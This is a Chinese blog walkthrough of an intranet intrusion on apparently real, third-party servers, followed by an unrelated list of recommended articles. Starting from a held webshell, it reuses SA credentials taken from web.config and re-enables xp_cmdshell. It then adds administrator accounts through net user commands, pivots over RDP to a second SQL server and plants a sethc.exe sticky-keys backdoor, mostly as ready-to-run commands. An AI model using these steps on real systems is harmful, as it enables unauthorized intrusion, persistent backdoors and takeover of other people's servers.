MSSQL入侵提权之内网渗透案例分析

作者：歪果仁 | 来源：互联网 | 2017-11-12 13:59

图文：udb311主题：MSSQL内网渗透案例分析发表：黑白前线描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行

图文：udb311
主题：MSSQL内网渗透案例分析
发表：黑白前线

描述：对于内网渗透技术一直感觉很神秘，手中正巧有一个webshell是内网服务器。借此机会练习下内网入侵渗透技术！本文敏感信息以屏蔽！密码都以*号代替。此次过程主要运用到xp_cmdshell恢复与执行，再通过自己的灵活思维运用。

环境：2003 SERVER
IIS ：6.0 支持php
数据库：MSSQL和MYSQL
网站类型：ASPX

本文重点讲述内网渗透提权部分，对于WEBSHELL不在描述。对于了解入侵渗透的朋友都知道，拿到webshell后服务器能否提权就要先找提权的漏洞所在。从本站的角度来看，存在MSSQL、MYSQL支持ASPX和PHP可以说权限够大的了。先来看看目录能穷举出来哪些东西。先看程序目录，很平常么。没现有SU和MYSQL之类的信息。

内网渗透1

E：盘可以浏览
F：盘可以浏览

本站ASPX 类型网站，使用的是MSSQL数据库。显示密码不是最高权限的用户，就是是个DB用户提权也不能马上到手。

内网渗透2

再翻翻别的站点，目录可以浏览一个个找吧。发现一个目录web.config有SA用户

内网渗透3

连接数据库信息：

Source=gzzx;Initial Catalog=SMSCenter;Persist Security Info=True;User ID=sa;Password=****" 打开aspxspy，使用database连接功能。

内网渗透4

登录成功，显示SA看来应该没有降权。

连接状态是MSSQL 2005，要先启xp_cmdshell.

内网渗透5

接着执行下命令"whoami"

内网渗透6

good，system 权限，下面就是添加一个账号了。。
Exec master.dbo.xp_cmdshell 'net user admin **** /add'

Exec master.dbo.xp_cmdshell 'net localgroup administrators admin /add'

再看下3389端口是否开启
Exec master.dbo.xp_cmdshell 'netstat -ano'

内网渗透7

OK,状态正常。
Exec master.dbo.xp_cmdshell 'ipconfig /all'显示配置是内网IP

通过域名解析到的IP连接3389，可以连接。
说明管理做了端口映射，这就不要转发端口了。省了很多功夫！

这才拿到了一台服务器的权限，从网站的SQL连接上不难发现内网还有SQL服务器。

渗透继续……

内网IP为200，同样是MSSQL SA权限。

内网渗透8

再利用aspxspy 数据库连接，

郁闷的事情发生了，不能连接。
[DBNETLIB][ConnectionOpen (Connect()).]SQL Server 不存在或拒绝访问。

按道理讲数据库能使用的情况下应该可以成功连接上的，难道没有配置TCP/IP访问数据库？疑问产生了，无耐之下通过3389上到服务器上来试试。服务器安装了MSSQL，有查询分析器和企业管理器。这又成了我们的工具。呵呵！
SQL分析器连接之，仍然无法连接。

内网渗透9

先测试下所在的MSSQL服务器机器的存在性。

内网渗透10

成功响应，说明服务器存在。
运行mstsc试着3389连接下，显示了一个xp的界面。比较郁闷耶。

试下名称解析服务。。。
点击浏览一看，这么多MSSQL服务器名还真不知道哪台是的。观察下发现200和IP200的机器有些相近。输入SA及密码。

内网渗透11
成功返回查询窗口。试下xp_cmdshell

发现不存在，恢复之
Use master dbcc addextendedproc('xp_cmdshell','xplog70.dll')
OK！

执行命令"whoami",虽然XP不支持whoami命令。

内网渗透12

exec xp_cmdshell 'net user 123 123 /add'

提示系统错误。不是没权限添加。。。。不明真像了。。。

思路：开了3389可以用sethc.exe 替换来。。。

内网渗透14

exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'替换之？
问题又来了，提示磁盘文件不足。
利用xp_dirtree查看下C盘
EXEC MASTER..XP_dirtree 'c:',1,1

内网渗透15
列出文件目录，删除一个数据库的备份
再执行exec xp_cmdshell 'copy c:windwosexplorer.exe c:windowssystem32sethc.exe'

内网渗透16

提示一个文件被复制，说明成功。3389 5次shift未弹出。

再试下
exec xp_cmdshell 'net user 123 123 /add' 提示成功。原来开始是空间不足导致的系统错误啊。真像揭开！
exec xp_cmdshell 'net localgroup administrator 123 /add'

3389登录之。。
exec xp_cmdshell 'net user 123 /del'删除用户

内网还存在很多机器，此次渗透就此结束。。。

总结：内网从端口转发到外部连接，再从3389登录内部3389 跟跳板技术差不多。

推荐阅读

text
Android 新闻App的本地服务器搭建教程

本文介绍了在开发Android新闻App时，搭建本地服务器的步骤。通过使用XAMPP软件，可以一键式搭建起开发环境，包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表，并设置相应的属性。最后，给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]

蜡笔小新 2023-12-14 17:15:19
install
搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的详细步骤

本文详细介绍了搭建Windows Server 2012 R2 IIS8.5+PHP（FastCGI）+MySQL环境的步骤，包括环境说明、相关软件下载的地址以及所需的插件下载地址。 ... [详细]

蜡笔小新 2023-12-14 17:03:58
text
如何限制php数据库链接数和连接超时时间？

本文介绍了如何使用php限制数据库插入的条数并显示每次插入数据库之间的数据数目，以及避免重复提交的方法。同时还介绍了如何限制某一个数据库用户的并发连接数，以及设置数据库的连接数和连接超时时间的方法。最后提供了一些关于浏览器在线用户数和数据库连接数量比例的参考值。 ... [详细]

蜡笔小新 2023-12-14 14:06:10
java
Hibernate基础映射

在说Hibernate映射前，我们先来了解下对象关系映射ORM。ORM的实现思想就是将关系数据库中表的数据映射成对象，以对象的形式展现。这样开发人员就可以把对数据库的操作转化为对 ... [详细]

蜡笔小新 2023-12-14 10:57:47
get
SQL日志收缩及截断方法详解

本文详细介绍了SQL日志收缩的方法，包括截断日志和删除不需要的旧日志记录。通过备份日志和使用DBCC SHRINKFILE命令可以实现日志的收缩。同时，还介绍了截断日志的原理和注意事项，包括不能截断事务日志的活动部分和MinLSN的确定方法。通过本文的方法，可以有效减小逻辑日志的大小，提高数据库的性能。 ... [详细]

蜡笔小新 2023-12-14 18:23:25
get
PHP设置MySQL字符集的方法及使用mysqli_set_charset函数

本文介绍了PHP设置MySQL字符集的方法，详细介绍了使用mysqli_set_charset函数来规定与数据库服务器进行数据传送时要使用的字符集。通过示例代码演示了如何设置默认客户端字符集。 ... [详细]

蜡笔小新 2023-12-14 15:30:33
get
Hibernate配置lazy=false时无法加载数据的问题解决方法

本文介绍了在Hibernate配置lazy=false时无法加载数据的问题，通过采用OpenSessionInView模式和修改数据库服务器版本解决了该问题。详细描述了问题的出现和解决过程，包括运行环境和数据库的配置信息。 ... [详细]

蜡笔小新 2023-12-14 13:59:45
search
Metasploit攻击渗透实践

本文介绍了Metasploit攻击渗透实践的内容和要求，包括主动攻击、针对浏览器和客户端的攻击，以及成功应用辅助模块的实践过程。其中涉及使用Hydra在不知道密码的情况下攻击metsploit2靶机获取密码，以及攻击浏览器中的tomcat服务的具体步骤。同时还讲解了爆破密码的方法和设置攻击目标主机的相关参数。 ... [详细]

蜡笔小新 2023-12-14 12:14:09
search
SpringBoot集成前端模版（thymeleaf）的配置步骤

本文介绍了在SpringBoot中集成thymeleaf前端模版的配置步骤，包括在application.properties配置文件中添加thymeleaf的配置信息，引入thymeleaf的jar包，以及创建PageController并添加index方法。 ... [详细]

蜡笔小新 2023-12-14 10:11:46
search
知识图谱——机器大脑中的知识库

本文介绍了知识图谱在机器大脑中的应用，以及搜索引擎在知识图谱方面的发展。以谷歌知识图谱为例，说明了知识图谱的智能化特点。通过搜索引擎用户可以获取更加智能化的答案，如搜索关键词"Marie Curie"，会得到居里夫人的详细信息以及与之相关的历史人物。知识图谱的出现引起了搜索引擎行业的变革，不仅美国的微软必应，中国的百度、搜狗等搜索引擎公司也纷纷推出了自己的知识图谱。 ... [详细]

蜡笔小新 2023-12-14 10:06:19
select
PHP中的MySQL函数库及其常用函数介绍

本文由编程笔记小编整理，介绍了PHP中的MySQL函数库及其常用函数，包括mysql_connect、mysql_error、mysql_select_db、mysql_query、mysql_affected_row、mysql_close等。希望对读者有一定的参考价值。 ... [详细]

蜡笔小新 2023-12-14 08:19:53
int
Oracle分析函数first_value()和last_value()的用法及原理

本文介绍了Oracle分析函数first_value()和last_value()的用法和原理，以及在查询销售记录日期和部门中的应用。通过示例和解释，详细说明了first_value()和last_value()的功能和不同之处。同时，对于last_value()的结果出现不一样的情况进行了解释，并提供了理解last_value()默认统计范围的方法。该文对于使用Oracle分析函数的开发人员和数据库管理员具有参考价值。 ... [详细]

蜡笔小新 2023-12-13 19:07:23
main
Java实现大数乘法（分治算法）

本文介绍了使用Java实现大数乘法的分治算法，包括输入数据的处理、普通大数乘法的结果和Karatsuba大数乘法的结果。通过改变long类型可以适应不同范围的大数乘法计算。 ... [详细]

蜡笔小新 2023-12-14 15:43:50
int
[译]技术公司十年经验的职场生涯回顾

本文是一位在技术公司工作十年的职场人士对自己职业生涯的总结回顾。她的职业规划与众不同，令人深思又有趣。其中涉及到的内容有机器学习、创新创业以及引用了女性主义者在TED演讲中的部分讲义。文章表达了对职业生涯的愿望和希望，认为人类有能力不断改善自己。 ... [详细]

蜡笔小新 2023-12-14 11:31:05
text
PHP实现断点续传乱序合并文件的方法和源码

本文介绍了使用PHP实现断点续传乱序合并文件的方法和源码。由于网络原因，文件需要分割成多个部分发送，因此无法按顺序接收。文章中提供了merge2.php的源码，通过使用shuffle函数打乱文件读取顺序，实现了乱序合并文件的功能。同时，还介绍了filesize、glob、unlink、fopen等相关函数的使用。阅读本文可以了解如何使用PHP实现断点续传乱序合并文件的具体步骤。 ... [详细]

蜡笔小新 2023-12-14 04:33:19

歪果仁

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章